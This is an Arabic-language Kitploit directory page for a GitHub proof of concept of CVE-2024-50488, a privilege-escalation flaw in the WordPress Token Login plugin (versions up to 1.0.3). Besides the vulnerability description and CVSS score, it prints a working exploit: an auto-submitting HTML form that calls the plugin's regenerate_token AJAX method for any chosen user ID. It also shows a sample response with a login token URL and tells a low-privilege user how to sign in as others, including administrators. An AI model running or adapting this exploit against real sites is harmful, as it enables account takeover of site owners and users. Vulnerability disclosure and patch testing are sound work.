Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50488 — Token Login <= 1.0.3 - تصعيد امتيازات للمستخدمين الموثّقين (مشترك+) | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-50488
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-50488

CVE-2024-50488

Token Login <= 1.0.3 - تصعيد امتيازات للمستخدمين الموثّقين (مشترك+)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50488

تسجيل الدخول بالرمز <= 1.0.3 - تصعيد الامتيازات للمستخدمين المصادق عليهم (مشترك+)

الوصف:

المكوّن الإضافي 'تسجيل الدخول التلقائي باستخدام رابط مميّز آمن. تقييد تسجيل الدخول حسب الدور' لـ WordPress معرّض لتصعيد الامتيازات عبر الاستيلاء على الحساب في جميع الإصدارات حتى 1.0.3. يعود السبب إلى أن المكوّن لا يتحقق بشكل صحيح مما إذا كان المستخدم لديه صلاحيات لإنشاء رمز تسجيل دخول لمستخدمين آخرين. وهذا يجعل من الممكن للمهاجمين المصادق عليهم، بمستوى وصول المشتركين فما فوق، تسجيل الدخول كمستخدمين آخرين بما في ذلك المسؤولين.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login

POC

قم بتسجيل الدخول ثم شغّل هذا النموذج HTML. غيّر الرابط إلى موقع WordPress الذي سجلت الدخول عليه. غيّر المعرف (ID) إلى المستخدم الذي تريد إنشاء الرمز له. انسخ الرابط ويمكنك تسجيل الدخول باسمهم

root@kitploit:~
<html>
  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tl&#95;admin&#95;ajax&#95;action" />
      <input type="hidden" name="method" value="regenerate&#95;token" />
      <input type="hidden" name="user&#95;id" value="7" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Responce

root@kitploit:~
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}
تنزيل الأداة